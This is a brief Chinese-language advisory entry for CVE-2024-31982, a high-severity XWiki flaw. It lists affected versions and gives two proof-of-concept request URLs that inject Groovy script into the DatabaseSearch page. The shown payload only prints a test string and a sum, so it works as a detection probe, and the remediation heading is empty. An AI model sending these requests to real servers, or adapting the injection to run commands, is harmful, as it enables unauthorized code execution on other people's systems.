CVE-2024-31982
高危
XWiki是一个功能强大、易于使用、灵活可定制的开源Wiki引擎,适用于各种知识管理和协作场景。
XWiki < 4.10.20
0x05 POC
{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=}}}{{async async%3Dfalse}}{{groovy}}println("Hello from" %2B " search text%3A" %2B (23 %2B 19)){{%2Fgroovy}}{{%2Fasync}}
{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=}}}{{async async%3Dfalse}}{{groovy}}println("Hello from" %2B " search text%3A" %2B (23 %2B 19)){{%2Fgroovy}}{{%2Fasync}}
0x06 修复建议